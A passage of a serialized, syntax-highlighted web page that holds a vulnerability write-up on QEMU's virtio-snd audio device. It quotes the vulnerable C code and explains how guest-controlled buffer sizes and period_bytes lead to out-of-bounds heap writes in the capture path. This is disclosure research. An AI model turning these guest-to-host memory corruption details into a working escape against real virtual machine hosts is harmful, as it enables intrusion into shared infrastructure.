stream\n",{"type":24,"tag":301,"props":131446,"children":131447},{"class":303,"line":401},[131448],{"type":24,"tag":301,"props":131449,"children":131450},{"style":1062},[131451],{"type":30,"value":131452}," * @available: number of bytes that can be read with AUD_read()\n",{"type":24,"tag":301,"props":131454,"children":131455},{"class":303,"line":415},[131456],{"type":24,"tag":301,"props":131457,"children":131458},{"style":1062},[131459],{"type":30,"value":130518},{"type":24,"tag":301,"props":131461,"children":131462},{"class":303,"line":439},[131463,131467,131471,131476,131480,131484,131488,131492,131496,131500,131505],{"type":24,"tag":301,"props":131464,"children":131465},{"style":348},[131466],{"type":30,"value":752},{"type":24,"tag":301,"props":131468,"children":131469},{"style":348},[131470],{"type":30,"value":757},{"type":24,"tag":301,"props":131472,"children":131473},{"style":314},[131474],{"type":30,"value":131475}," virtio_snd_pcm_in_cb",{"type":24,"tag":301,"props":131477,"children":131478},{"style":359},[131479],{"type":30,"value":362},{"type":24,"tag":301,"props":131481,"children":131482},{"style":348},[131483],{"type":30,"value":58352},{"type":24,"tag":301,"props":131485,"children":131486},{"style":385},[131487],{"type":30,"value":431},{"type":24,"tag":301,"props":131489,"children":131490},{"style":369},[131491],{"type":30,"value":10528},{"type":24,"tag":301,"props":131493,"children":131494},{"style":359},[131495],{"type":30,"value":377},{"type":24,"tag":301,"props":131497,"children":131498},{"style":348},[131499],{"type":30,"value":351},{"type":24,"tag":301,"props":131501,"children":131502},{"style":369},[131503],{"type":30,"value":131504}," available",{"type":24,"tag":301,"props":131506,"children":131507},{"style":359},[131508],{"type":30,"value":791},{"type":24,"tag":301,"props":131510,"children":131511},{"class":303,"line":447},[131512],{"type":24,"tag":301,"props":131513,"children":131514},{"style":359},[131515],{"type":30,"value":799},{"type":24,"tag":301,"props":131517,"children":131518},{"class":303,"line":476},[131519,131524,131528,131533,131537],{"type":24,"tag":301,"props":131520,"children":131521},{"style":359},[131522],{"type":30,"value":131523}," VirtIOSoundPCMStream ",{"type":24,"tag":301,"props":131525,"children":131526},{"style":385},[131527],{"type":30,"value":772},{"type":24,"tag":301,"props":131529,"children":131530},{"style":359},[131531],{"type":30,"value":131532},"stream ",{"type":24,"tag":301,"props":131534,"children":131535},{"style":385},[131536],{"type":30,"value":523},{"type":24,"tag":301,"props":131538,"children":131539},{"style":359},[131540],{"type":30,"value":131541}," data;\n",{"type":24,"tag":301,"props":131543,"children":131544},{"class":303,"line":495},[131545,131550,131554],{"type":24,"tag":301,"props":131546,"children":131547},{"style":359},[131548],{"type":30,"value":131549}," VirtIOSoundPCMBuffer ",{"type":24,"tag":301,"props":131551,"children":131552},{"style":385},[131553],{"type":30,"value":772},{"type":24,"tag":301,"props":131555,"children":131556},{"style":359},[131557],{"type":30,"value":131558},"buffer;\n",{"type":24,"tag":301,"props":131560,"children":131561},{"class":303,"line":504},[131562,131566],{"type":24,"tag":301,"props":131563,"children":131564},{"style":348},[131565],{"type":30,"value":3093},{"type":24,"tag":301,"props":131567,"children":131568},{"style":359},[131569],{"type":30,"value":131570}," size, max_size;\n",{"type":24,"tag":301,"props":131572,"children":131573},{"class":303,"line":512},[131574],{"type":24,"tag":301,"props":131575,"children":131576},{"emptyLinePlaceholder":16},[131577],{"type":30,"value":341},{"type":24,"tag":301,"props":131579,"children":131580},{"class":303,"line":592},[131581,131586,131590,131594,131598,131602,131606],{"type":24,"tag":301,"props":131582,"children":131583},{"style":314},[131584],{"type":30,"value":131585}," WITH_QEMU_LOCK_GUARD",{"type":24,"tag":301,"props":131587,"children":131588},{"style":359},[131589],{"type":30,"value":362},{"type":24,"tag":301,"props":131591,"children":131592},{"style":385},[131593],{"type":30,"value":556},{"type":24,"tag":301,"props":131595,"children":131596},{"style":369},[131597],{"type":30,"value":43003},{"type":24,"tag":301,"props":131599,"children":131600},{"style":359},[131601],{"type":30,"value":882},{"type":24,"tag":301,"props":131603,"children":131604},{"style":369},[131605],{"type":30,"value":130764},{"type":24,"tag":301,"props":131607,"children":131608},{"style":359},[131609],{"type":30,"value":398},{"type":24,"tag":301,"props":131611,"children":131612},{"class":303,"line":619},[131613,131618,131622,131626,131631,131635,131639,131643,131647,131651],{"type":24,"tag":301,"props":131614,"children":131615},{"style":308},[131616],{"type":30,"value":131617}," while",{"type":24,"tag":301,"props":131619,"children":131620},{"style":359},[131621],{"type":30,"value":873},{"type":24,"tag":301,"props":131623,"children":131624},{"style":385},[131625],{"type":30,"value":2485},{"type":24,"tag":301,"props":131627,"children":131628},{"style":314},[131629],{"type":30,"value":131630},"QSIMPLEQ_EMPTY",{"type":24,"tag":301,"props":131632,"children":131633},{"style":359},[131634],{"type":30,"value":362},{"type":24,"tag":301,"props":131636,"children":131637},{"style":385},[131638],{"type":30,"value":556},{"type":24,"tag":301,"props":131640,"children":131641},{"style":369},[131642],{"type":30,"value":43003},{"type":24,"tag":301,"props":131644,"children":131645},{"style":359},[131646],{"type":30,"value":882},{"type":24,"tag":301,"props":131648,"children":131649},{"style":369},[131650],{"type":30,"value":131016},{"type":24,"tag":301,"props":131652,"children":131653},{"style":359},[131654],{"type":30,"value":41941},{"type":24,"tag":301,"props":131656,"children":131657},{"class":303,"line":635},[131658,131662,131666,131671,131675,131679,131683,131687,131691],{"type":24,"tag":301,"props":131659,"children":131660},{"style":359},[131661],{"type":30,"value":130853},{"type":24,"tag":301,"props":131663,"children":131664},{"style":385},[131665],{"type":30,"value":523},{"type":24,"tag":301,"props":131667,"children":131668},{"style":314},[131669],{"type":30,"value":131670}," QSIMPLEQ_FIRST",{"type":24,"tag":301,"props":131672,"children":131673},{"style":359},[131674],{"type":30,"value":362},{"type":24,"tag":301,"props":131676,"children":131677},{"style":385},[131678],{"type":30,"value":556},{"type":24,"tag":301,"props":131680,"children":131681},{"style":369},[131682],{"type":30,"value":43003},{"type":24,"tag":301,"props":131684,"children":131685},{"style":359},[131686],{"type":30,"value":882},{"type":24,"tag":301,"props":131688,"children":131689},{"style":369},[131690],{"type":30,"value":131016},{"type":24,"tag":301,"props":131692,"children":131693},{"style":359},[131694],{"type":30,"value":589},{"type":24,"tag":301,"props":131696,"children":131697},{"class":303,"line":643},[131698],{"type":24,"tag":301,"props":131699,"children":131700},{"emptyLinePlaceholder":16},[131701],{"type":30,"value":341},{"type":24,"tag":301,"props":131703,"children":131704},{"class":303,"line":652},[131705],{"type":24,"tag":301,"props":131706,"children":131707},{"style":359},[131708],{"type":30,"value":131709}," [...]\n",{"type":24,"tag":301,"props":131711,"children":131712},{"class":303,"line":666},[131713],{"type":24,"tag":301,"props":131714,"children":131715},{"emptyLinePlaceholder":16},[131716],{"type":30,"value":341},{"type":24,"tag":301,"props":131718,"children":131719},{"class":303,"line":674},[131720,131725,131729,131733,131737],{"type":24,"tag":301,"props":131721,"children":131722},{"style":359},[131723],{"type":30,"value":131724}," max_size ",{"type":24,"tag":301,"props":131726,"children":131727},{"style":385},[131728],{"type":30,"value":523},{"type":24,"tag":301,"props":131730,"children":131731},{"style":314},[131732],{"type":30,"value":130785},{"type":24,"tag":301,"props":131734,"children":131735},{"style":359},[131736],{"type":30,"value":362},{"type":24,"tag":301,"props":131738,"children":131739},{"style":1062},[131740],{"type":30,"value":131741}," // [1]\n",{"type":24,"tag":301,"props":131743,"children":131744},{"class":303,"line":692},[131745,131750,131754,131758,131762,131766],{"type":24,"tag":301,"props":131746,"children":131747},{"style":369},[131748],{"type":30,"value":131749}," buffer",{"type":24,"tag":301,"props":131751,"children":131752},{"style":359},[131753],{"type":30,"value":882},{"type":24,"tag":301,"props":131755,"children":131756},{"style":369},[131757],{"type":30,"value":58789},{"type":24,"tag":301,"props":131759,"children":131760},{"style":359},[131761],{"type":30,"value":882},{"type":24,"tag":301,"props":131763,"children":131764},{"style":369},[131765],{"type":30,"value":130802},{"type":24,"tag":301,"props":131767,"children":131768},{"style":359},[131769],{"type":30,"value":1729},{"type":24,"tag":301,"props":131771,"children":131772},{"class":303,"line":3631},[131773,131777,131781,131785,131789],{"type":24,"tag":301,"props":131774,"children":131775},{"style":369},[131776],{"type":30,"value":131749},{"type":24,"tag":301,"props":131778,"children":131779},{"style":359},[131780],{"type":30,"value":882},{"type":24,"tag":301,"props":131782,"children":131783},{"style":369},[131784],{"type":30,"value":58789},{"type":24,"tag":301,"props":131786,"children":131787},{"style":359},[131788],{"type":30,"value":882},{"type":24,"tag":301,"props":131790,"children":131791},{"style":369},[131792],{"type":30,"value":131793},"in_num\n",{"type":24,"tag":301,"props":131795,"children":131796},{"class":303,"line":3639},[131797],{"type":24,"tag":301,"props":131798,"children":131799},{"style":359},[131800],{"type":30,"value":4674},{"type":24,"tag":301,"props":131802,"children":131803},{"class":303,"line":3647},[131804,131809],{"type":24,"tag":301,"props":131805,"children":131806},{"style":308},[131807],{"type":30,"value":131808}," for",{"type":24,"tag":301,"props":131810,"children":131811},{"style":359},[131812],{"type":30,"value":130616},{"type":24,"tag":301,"props":131814,"children":131815},{"class":303,"line":3685},[131816,131820,131824,131829,131833,131837,131841,131846],{"type":24,"tag":301,"props":131817,"children":131818},{"style":308},[131819],{"type":30,"value":110214},{"type":24,"tag":301,"props":131821,"children":131822},{"style":359},[131823],{"type":30,"value":873},{"type":24,"tag":301,"props":131825,"children":131826},{"style":369},[131827],{"type":30,"value":131828},"buffer",{"type":24,"tag":301,"props":131830,"children":131831},{"style":359},[131832],{"type":30,"value":882},{"type":24,"tag":301,"props":131834,"children":131835},{"style":369},[131836],{"type":30,"value":3219},{"type":24,"tag":301,"props":131838,"children":131839},{"style":385},[131840],{"type":30,"value":892},{"type":24,"tag":301,"props":131842,"children":131843},{"style":359},[131844],{"type":30,"value":131845}," max_size) {",{"type":24,"tag":301,"props":131847,"children":131848},{"style":1062},[131849],{"type":30,"value":131850}," // [2]\n",{"type":24,"tag":301,"props":131852,"children":131853},{"class":303,"line":3713},[131854,131859],{"type":24,"tag":301,"props":131855,"children":131856},{"style":314},[131857],{"type":30,"value":131858}," return_rx_buffer",{"type":24,"tag":301,"props":131860,"children":131861},{"style":359},[131862],{"type":30,"value":131863},"(stream, buffer);\n",{"type":24,"tag":301,"props":131865,"children":131866},{"class":303,"line":3721},[131867,131872],{"type":24,"tag":301,"props":131868,"children":131869},{"style":308},[131870],{"type":30,"value":131871}," break",{"type":24,"tag":301,"props":131873,"children":131874},{"style":359},[131875],{"type":30,"value":492},{"type":24,"tag":301,"props":131877,"children":131878},{"class":303,"line":3751},[131879],{"type":24,"tag":301,"props":131880,"children":131881},{"style":359},[131882],{"type":30,"value":4211},{"type":24,"tag":301,"props":131884,"children":131885},{"class":303,"line":3782},[131886,131891,131895,131900,131904,131908,131912,131917,131921,131925],{"type":24,"tag":301,"props":131887,"children":131888},{"style":359},[131889],{"type":30,"value":131890}," size ",{"type":24,"tag":301,"props":131892,"children":131893},{"style":385},[131894],{"type":30,"value":523},{"type":24,"tag":301,"props":131896,"children":131897},{"style":314},[131898],{"type":30,"value":131899}," AUD_read",{"type":24,"tag":301,"props":131901,"children":131902},{"style":359},[131903],{"type":30,"value":362},{"type":24,"tag":301,"props":131905,"children":131906},{"style":369},[131907],{"type":30,"value":43003},{"type":24,"tag":301,"props":131909,"children":131910},{"style":359},[131911],{"type":30,"value":882},{"type":24,"tag":301,"props":131913,"children":131914},{"style":369},[131915],{"type":30,"value":131916},"voice",{"type":24,"tag":301,"props":131918,"children":131919},{"style":359},[131920],{"type":30,"value":206},{"type":24,"tag":301,"props":131922,"children":131923},{"style":369},[131924],{"type":30,"value":102195},{"type":24,"tag":301,"props":131926,"children":131927},{"style":359},[131928],{"type":30,"value":1729},{"type":24,"tag":301,"props":131930,"children":131931},{"class":303,"line":3791},[131932,131937,131941,131945,131949,131954,131958,131962],{"type":24,"tag":301,"props":131933,"children":131934},{"style":369},[131935],{"type":30,"value":131936}," buffer",{"type":24,"tag":301,"props":131938,"children":131939},{"style":359},[131940],{"type":30,"value":882},{"type":24,"tag":301,"props":131942,"children":131943},{"style":369},[131944],{"type":30,"value":10528},{"type":24,"tag":301,"props":131946,"children":131947},{"style":385},[131948],{"type":30,"value":957},{"type":24,"tag":301,"props":131950,"children":131951},{"style":369},[131952],{"type":30,"value":131953}," buffer",{"type":24,"tag":301,"props":131955,"children":131956},{"style":359},[131957],{"type":30,"value":882},{"type":24,"tag":301,"props":131959,"children":131960},{"style":369},[131961],{"type":30,"value":3219},{"type":24,"tag":301,"props":131963,"children":131964},{"style":359},[131965],{"type":30,"value":1729},{"type":24,"tag":301,"props":131967,"children":131968},{"class":303,"line":3819},[131969,131974,131979,131983,131987,131991,131995,132000,132004],{"type":24,"tag":301,"props":131970,"children":131971},{"style":314},[131972],{"type":30,"value":131973}," MIN",{"type":24,"tag":301,"props":131975,"children":131976},{"style":359},[131977],{"type":30,"value":131978},"(available, (",{"type":24,"tag":301,"props":131980,"children":131981},{"style":369},[131982],{"type":30,"value":43003},{"type":24,"tag":301,"props":131984,"children":131985},{"style":359},[131986],{"type":30,"value":882},{"type":24,"tag":301,"props":131988,"children":131989},{"style":369},[131990],{"type":30,"value":104978},{"type":24,"tag":301,"props":131992,"children":131993},{"style":359},[131994],{"type":30,"value":206},{"type":24,"tag":301,"props":131996,"children":131997},{"style":369},[131998],{"type":30,"value":131999},"period_bytes",{"type":24,"tag":301,"props":132001,"children":132002},{"style":385},[132003],{"type":30,"value":3407},{"type":24,"tag":301,"props":132005,"children":132006},{"style":1062},[132007],{"type":30,"value":132008}," // [3]\n",{"type":24,"tag":301,"props":132010,"children":132011},{"class":303,"line":4397},[132012,132017,132021,132025],{"type":24,"tag":301,"props":132013,"children":132014},{"style":369},[132015],{"type":30,"value":132016}," buffer",{"type":24,"tag":301,"props":132018,"children":132019},{"style":359},[132020],{"type":30,"value":882},{"type":24,"tag":301,"props":132022,"children":132023},{"style":369},[132024],{"type":30,"value":3219},{"type":24,"tag":301,"props":132026,"children":132027},{"style":359},[132028],{"type":30,"value":132029},")));\n",{"type":24,"tag":301,"props":132031,"children":132032},{"class":303,"line":4405},[132033,132037,132041,132045],{"type":24,"tag":301,"props":132034,"children":132035},{"style":308},[132036],{"type":30,"value":110214},{"type":24,"tag":301,"props":132038,"children":132039},{"style":359},[132040],{"type":30,"value":873},{"type":24,"tag":301,"props":132042,"children":132043},{"style":385},[132044],{"type":30,"value":2485},{"type":24,"tag":301,"props":132046,"children":132047},{"style":359},[132048],{"type":30,"value":132049},"size) {\n",{"type":24,"tag":301,"props":132051,"children":132052},{"class":303,"line":4422},[132053,132058,132062,132066],{"type":24,"tag":301,"props":132054,"children":132055},{"style":359},[132056],{"type":30,"value":132057}," available ",{"type":24,"tag":301,"props":132059,"children":132060},{"style":385},[132061],{"type":30,"value":523},{"type":24,"tag":301,"props":132063,"children":132064},{"style":466},[132065],{"type":30,"value":685},{"type":24,"tag":301,"props":132067,"children":132068},{"style":359},[132069],{"type":30,"value":492},{"type":24,"tag":301,"props":132071,"children":132072},{"class":303,"line":4438},[132073,132077],{"type":24,"tag":301,"props":132074,"children":132075},{"style":308},[132076],{"type":30,"value":131871},{"type":24,"tag":301,"props":132078,"children":132079},{"style":359},[132080],{"type":30,"value":492},{"type":24,"tag":301,"props":132082,"children":132083},{"class":303,"line":4446},[132084],{"type":24,"tag":301,"props":132085,"children":132086},{"style":359},[132087],{"type":30,"value":4211},{"type":24,"tag":301,"props":132089,"children":132090},{"class":303,"line":4506},[132091,132095,132099,132103,132107],{"type":24,"tag":301,"props":132092,"children":132093},{"style":369},[132094],{"type":30,"value":131749},{"type":24,"tag":301,"props":132096,"children":132097},{"style":359},[132098],{"type":30,"value":882},{"type":24,"tag":301,"props":132100,"children":132101},{"style":369},[132102],{"type":30,"value":3219},{"type":24,"tag":301,"props":132104,"children":132105},{"style":385},[132106],{"type":30,"value":21855},{"type":24,"tag":301,"props":132108,"children":132109},{"style":359},[132110],{"type":30,"value":3098},{"type":24,"tag":301,"props":132112,"children":132113},{"class":303,"line":4566},[132114,132119,132123],{"type":24,"tag":301,"props":132115,"children":132116},{"style":359},[132117],{"type":30,"value":132118}," available ",{"type":24,"tag":301,"props":132120,"children":132121},{"style":385},[132122],{"type":30,"value":110679},{"type":24,"tag":301,"props":132124,"children":132125},{"style":359},[132126],{"type":30,"value":3098},{"type":24,"tag":301,"props":132128,"children":132129},{"class":303,"line":4574},[132130],{"type":24,"tag":301,"props":132131,"children":132132},{"style":359},[132133],{"type":30,"value":132134}," [...]\n",{"type":24,"tag":301,"props":132136,"children":132137},{"class":303,"line":4590},[132138],{"type":24,"tag":301,"props":132139,"children":132140},{"style":359},[132141],{"type":30,"value":65600},{"type":24,"tag":301,"props":132143,"children":132144},{"class":303,"line":4599},[132145],{"type":24,"tag":301,"props":132146,"children":132147},{"style":359},[132148],{"type":30,"value":3345},{"type":24,"tag":301,"props":132150,"children":132151},{"class":303,"line":4629},[132152],{"type":24,"tag":301,"props":132153,"children":132154},{"style":359},[132155],{"type":30,"value":501},{"type":24,"tag":301,"props":132157,"children":132158},{"class":303,"line":4659},[132159],{"type":24,"tag":301,"props":132160,"children":132161},{"style":359},[132162],{"type":30,"value":698},{"type":24,"tag":32,"props":132164,"children":132165},{},[132166,132167,132172,132173,132179,132180,132186,132188,132193,132194,132199,132201,132206],{"type":30,"value":131070},{"type":24,"tag":145,"props":132168,"children":132170},{"className":132169},[],[132171],{"type":30,"value":131076},{"type":30,"value":377},{"type":24,"tag":145,"props":132174,"children":132176},{"className":132175},[],[132177],{"type":30,"value":132178},"max_size",{"type":30,"value":8772},{"type":24,"tag":145,"props":132181,"children":132183},{"className":132182},[],[132184],{"type":30,"value":132185},"iov_size(in_sg, in_num)",{"type":30,"value":132187},". Both ",{"type":24,"tag":145,"props":132189,"children":132191},{"className":132190},[],[132192],{"type":30,"value":130802},{"type":30,"value":2378},{"type":24,"tag":145,"props":132195,"children":132197},{"className":132196},[],[132198],{"type":30,"value":130819},{"type":30,"value":132200}," are the same guest-controlled fields from ",{"type":24,"tag":145,"props":132202,"children":132204},{"className":132203},[],[132205],{"type":30,"value":130455},{"type":30,"value":206},{"type":24,"tag":32,"props":132208,"children":132209},{},[132210,132212,132217,132219,132225,132227,132233,132235,132241],{"type":30,"value":132211},"Later, at ",{"type":24,"tag":145,"props":132213,"children":132215},{"className":132214},[],[132216],{"type":30,"value":131111},{"type":30,"value":132218},", the code checks whether ",{"type":24,"tag":145,"props":132220,"children":132222},{"className":132221},[],[132223],{"type":30,"value":132224},"buffer->size >= max_size",{"type":30,"value":132226},". In the RX path, ",{"type":24,"tag":145,"props":132228,"children":132230},{"className":132229},[],[132231],{"type":30,"value":132232},"buffer->size",{"type":30,"value":132234}," tracks how many bytes have been written into ",{"type":24,"tag":145,"props":132236,"children":132238},{"className":132237},[],[132239],{"type":30,"value":132240},"buffer->data",{"type":30,"value":132242},", not the size of the allocation itself. This check is therefore intended to stop reading once the buffer is full.",{"type":24,"tag":32,"props":132244,"children":132245},{},[132246,132248,132253,132255,132261,132263,132268,132270,132276],{"type":30,"value":132247},"However, this does not match the allocation logic in ",{"type":24,"tag":145,"props":132249,"children":132251},{"className":132250},[],[132252],{"type":30,"value":130455},{"type":30,"value":132254},", which used: ",{"type":24,"tag":145,"props":132256,"children":132258},{"className":132257},[],[132259],{"type":30,"value":132260},"size = iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status);",{"type":30,"value":132262},". In other words, the allocation subtracts ",{"type":24,"tag":145,"props":132264,"children":132266},{"className":132265},[],[132267],{"type":30,"value":131177},{"type":30,"value":132269},", but the later bound in ",{"type":24,"tag":145,"props":132271,"children":132273},{"className":132272},[],[132274],{"type":30,"value":132275},"virtio_snd_pcm_in_cb",{"type":30,"value":132277}," does not. That mismatch gives us a second bug: an 8-byte OOB write.",{"type":24,"tag":32,"props":132279,"children":132280},{},[132281,132283,132288,132290,132296,132298,132304,132306,132311,132313,132319,132321,132327,132329,132334,132336,132341],{"type":30,"value":132282},"Finally, at ",{"type":24,"tag":145,"props":132284,"children":132286},{"className":132285},[],[132287],{"type":30,"value":131135},{"type":30,"value":132289},", the code calls ",{"type":24,"tag":145,"props":132291,"children":132293},{"className":132292},[],[132294],{"type":30,"value":132295},"AUD_read",{"type":30,"value":132297}," with the following limit:\n",{"type":24,"tag":145,"props":132299,"children":132301},{"className":132300},[],[132302],{"type":30,"value":132303},"MIN(available, stream->params.period_bytes - buffer->size)",{"type":30,"value":132305},". Notice how this bound does not take ",{"type":24,"tag":145,"props":132307,"children":132309},{"className":132308},[],[132310],{"type":30,"value":132178},{"type":30,"value":132312}," into account at all. That means if ",{"type":24,"tag":145,"props":132314,"children":132316},{"className":132315},[],[132317],{"type":30,"value":132318},"available",{"type":30,"value":132320}," is larger than the allocated buffer, and ",{"type":24,"tag":145,"props":132322,"children":132324},{"className":132323},[],[132325],{"type":30,"value":132326},"stream->params.period_bytes",{"type":30,"value":132328}," is also larger than the allocated buffer, ",{"type":24,"tag":145,"props":132330,"children":132332},{"className":132331},[],[132333],{"type":30,"value":132295},{"type":30,"value":132335}," will write past the end of ",{"type":24,"tag":145,"props":132337,"children":132339},{"className":132338},[],[132340],{"type":30,"value":132240},{"type":30,"value":132342}," - the third, and final, bug we found.",{"type":24,"tag":32,"props":132344,"children":132345},{},[132346,132348,132353,132355,132361],{"type":30,"value":132347},"Looking further at the code, we can see that ",{"type":24,"tag":145,"props":132349,"children":132351},{"className":132350},[],[132352],{"type":30,"value":132326},{"type":30,"value":132354}," is fully guest-controlled by issuing a ",{"type":24,"tag":145,"props":132356,"children":132358},{"className":132357},[],[132359],{"type":30,"value":132360},"VIRTIO_SND_R_PCM_SET_PARAMS",{"type":30,"value":132362}," request:",{"type":24,"tag":291,"props":132364,"children":132366},{"code":132365,"language":294,"meta":7,"className":295,"style":7},"static\nuint32_t virtio_snd_set_pcm_params(VirtIOSound *s,\n uint32_t stream_id,\n virtio_snd_pcm_set_params *params)\n{\n virtio_snd_pcm_set_params *st_params;\n\n [...]\n\n st_params = virtio_snd_pcm_get_params(s, stream_id);\n\n [...]\n\n st_params->buffer_bytes = le32_to_cpu(params->buffer_bytes);\n st_params->period_bytes = le32_to_cpu(params->period_bytes);\n st_params->features = le32_to_cpu(params->features);\n /* the following are uint8_t, so there's no need to bswap the values. */\n st_params->channels = params->channels;\n st_params->format = params->format;\n st_params->rate = params->rate;\n\n return cpu_to_le32(VIRTIO_SND_S_OK);\n}\n",[132367],{"type":24,"tag":145,"props":132368,"children":132369},{"__ignoreMap":7},[132370,132378,132407,132424,132444,132451,132468,132475,132482,132489,132511,132518,132525,132532,132578,132621,132665,132673,132710,132746,132782,132789,132806],{"type":24,"tag":301,"props":132371,"children":132372},{"class":303,"line":304},[132373],{"type":24,"tag":301,"props":132374,"children":132375},{"style":348},[132376],{"type":30,"value":132377},"static\n",{"type":24,"tag":301,"props":132379,"children":132380},{"class":303,"line":320},[132381,132385,132390,132395,132399,132403],{"type":24,"tag":301,"props":132382,"children":132383},{"style":348},[132384],{"type":30,"value":7041},{"type":24,"tag":301,"props":132386,"children":132387},{"style":314},[132388],{"type":30,"value":132389}," virtio_snd_set_pcm_params",{"type":24,"tag":301,"props":132391,"children":132392},{"style":359},[132393],{"type":30,"value":132394},"(VirtIOSound ",{"type":24,"tag":301,"props":132396,"children":132397},{"style":385},[132398],{"type":30,"value":772},{"type":24,"tag":301,"props":132400,"children":132401},{"style":369},[132402],{"type":30,"value":1724},{"type":24,"tag":301,"props":132404,"children":132405},{"style":359},[132406],{"type":30,"value":1729},{"type":24,"tag":301,"props":132408,"children":132409},{"class":303,"line":335},[132410,132415,132420],{"type":24,"tag":301,"props":132411,"children":132412},{"style":348},[132413],{"type":30,"value":132414}," uint32_t",{"type":24,"tag":301,"props":132416,"children":132417},{"style":369},[132418],{"type":30,"value":132419}," stream_id",{"type":24,"tag":301,"props":132421,"children":132422},{"style":359},[132423],{"type":30,"value":1729},{"type":24,"tag":301,"props":132425,"children":132426},{"class":303,"line":344},[132427,132432,132436,132440],{"type":24,"tag":301,"props":132428,"children":132429},{"style":359},[132430],{"type":30,"value":132431}," virtio_snd_pcm_set_params ",{"type":24,"tag":301,"props":132433,"children":132434},{"style":385},[132435],{"type":30,"value":772},{"type":24,"tag":301,"props":132437,"children":132438},{"style":369},[132439],{"type":30,"value":104978},{"type":24,"tag":301,"props":132441,"children":132442},{"style":359},[132443],{"type":30,"value":791},{"type":24,"tag":301,"props":132445,"children":132446},{"class":303,"line":401},[132447],{"type":24,"tag":301,"props":132448,"children":132449},{"style":359},[132450],{"type":30,"value":799},{"type":24,"tag":301,"props":132452,"children":132453},{"class":303,"line":415},[132454,132459,132463],{"type":24,"tag":301,"props":132455,"children":132456},{"style":359},[132457],{"type":30,"value":132458}," virtio_snd_pcm_set_params ",{"type":24,"tag":301,"props":132460,"children":132461},{"style":385},[132462],{"type":30,"value":772},{"type":24,"tag":301,"props":132464,"children":132465},{"style":359},[132466],{"type":30,"value":132467},"st_params;\n",{"type":24,"tag":301,"props":132469,"children":132470},{"class":303,"line":439},[132471],{"type":24,"tag":301,"props":132472,"children":132473},{"emptyLinePlaceholder":16},[132474],{"type":30,"value":341},{"type":24,"tag":301,"props":132476,"children":132477},{"class":303,"line":447},[132478],{"type":24,"tag":301,"props":132479,"children":132480},{"style":359},[132481],{"type":30,"value":111495},{"type":24,"tag":301,"props":132483,"children":132484},{"class":303,"line":476},[132485],{"type":24,"tag":301,"props":132486,"children":132487},{"emptyLinePlaceholder":16},[132488],{"type":30,"value":341},{"type":24,"tag":301,"props":132490,"children":132491},{"class":303,"line":495},[132492,132497,132501,132506],{"type":24,"tag":301,"props":132493,"children":132494},{"style":359},[132495],{"type":30,"value":132496}," st_params ",{"type":24,"tag":301,"props":132498,"children":132499},{"style":385},[132500],{"type":30,"value":523},{"type":24,"tag":301,"props":132502,"children":132503},{"style":314},[132504],{"type":30,"value":132505}," virtio_snd_pcm_get_params",{"type":24,"tag":301,"props":132507,"children":132508},{"style":359},[132509],{"type":30,"value":132510},"(s, stream_id);\n",{"type":24,"tag":301,"props":132512,"children":132513},{"class":303,"line":504},[132514],{"type":24,"tag":301,"props":132515,"children":132516},{"emptyLinePlaceholder":16},[132517],{"type":30,"value":341},{"type":24,"tag":301,"props":132519,"children":132520},{"class":303,"line":512},[132521],{"type":24,"tag":301,"props":132522,"children":132523},{"style":359},[132524],{"type":30,"value":111495},{"type":24,"tag":301,"props":132526,"children":132527},{"class":303,"line":592},[132528],{"type":24,"tag":301,"props":132529,"children":132530},{"emptyLinePlaceholder":16},[132531],{"type":30,"value":341},{"type":24,"tag":301,"props":132533,"children":132534},{"class":303,"line":619},[132535,132540,132544,132549,132553,132558,132562,132566,132570,132574],{"type":24,"tag":301,"props":132536,"children":132537},{"style":369},[132538],{"type":30,"value":132539}," st_params",{"type":24,"tag":301,"props":132541,"children":132542},{"style":359},[132543],{"type":30,"value":882},{"type":24,"tag":301,"props":132545,"children":132546},{"style":369},[132547],{"type":30,"value":132548},"buffer_bytes",{"type":24,"tag":301,"props":132550,"children":132551},{"style":385},[132552],{"type":30,"value":2537},{"type":24,"tag":301,"props":132554,"children":132555},{"style":314},[132556],{"type":30,"value":132557}," le32_to_cpu",{"type":24,"tag":301,"props":132559,"children":132560},{"style":359},[132561],{"type":30,"value":362},{"type":24,"tag":301,"props":132563,"children":132564},{"style":369},[132565],{"type":30,"value":104978},{"type":24,"tag":301,"props":132567,"children":132568},{"style":359},[132569],{"type":30,"value":882},{"type":24,"tag":301,"props":132571,"children":132572},{"style":369},[132573],{"type":30,"value":132548},{"type":24,"tag":301,"props":132575,"children":132576},{"style":359},[132577],{"type":30,"value":589},{"type":24,"tag":301,"props":132579,"children":132580},{"class":303,"line":635},[132581,132585,132589,132593,132597,132601,132605,132609,132613,132617],{"type":24,"tag":301,"props":132582,"children":132583},{"style":369},[132584],{"type":30,"value":132539},{"type":24,"tag":301,"props":132586,"children":132587},{"style":359},[132588],{"type":30,"value":882},{"type":24,"tag":301,"props":132590,"children":132591},{"style":369},[132592],{"type":30,"value":131999},{"type":24,"tag":301,"props":132594,"children":132595},{"style":385},[132596],{"type":30,"value":2537},{"type":24,"tag":301,"props":132598,"children":132599},{"style":314},[132600],{"type":30,"value":132557},{"type":24,"tag":301,"props":132602,"children":132603},{"style":359},[132604],{"type":30,"value":362},{"type":24,"tag":301,"props":132606,"children":132607},{"style":369},[132608],{"type":30,"value":104978},{"type":24,"tag":301,"props":132610,"children":132611},{"style":359},[132612],{"type":30,"value":882},{"type":24,"tag":301,"props":132614,"children":132615},{"style":369},[132616],{"type":30,"value":131999},{"type":24,"tag":301,"props":132618,"children":132619},{"style":359},[132620],{"type":30,"value":589},{"type":24,"tag":301,"props":132622,"children":132623},{"class":303,"line":643},[132624,132628,132632,132637,132641,132645,132649,132653,132657,132661],{"type":24,"tag":301,"props":132625,"children":132626},{"style":369},[132627],{"type":30,"value":132539},{"type":24,"tag":301,"props":132629,"children":132630},{"style":359},[132631],{"type":30,"value":882},{"type":24,"tag":301,"props":132633,"children":132634},{"style":369},[132635],{"type":30,"value":132636},"features",{"type":24,"tag":301,"props":132638,"children":132639},{"style":385},[132640],{"type":30,"value":2537},{"type":24,"tag":301,"props":132642,"children":132643},{"style":314},[132644],{"type":30,"value":132557},{"type":24,"tag":301,"props":132646,"children":132647},{"style":359},[132648],{"type":30,"value":362},{"type":24,"tag":301,"props":132650,"children":132651},{"style":369},[132652],{"type":30,"value":104978},{"type":24,"tag":301,"props":132654,"children":132655},{"style":359},[132656],{"type":30,"value":882},{"type":24,"tag":301,"props":132658,"children":132659},{"style":369},[132660],{"type":30,"value":132636},{"type":24,"tag":301,"props":132662,"children":132663},{"style":359},[132664],{"type":30,"value":589},{"type":24,"tag":301,"props":132666,"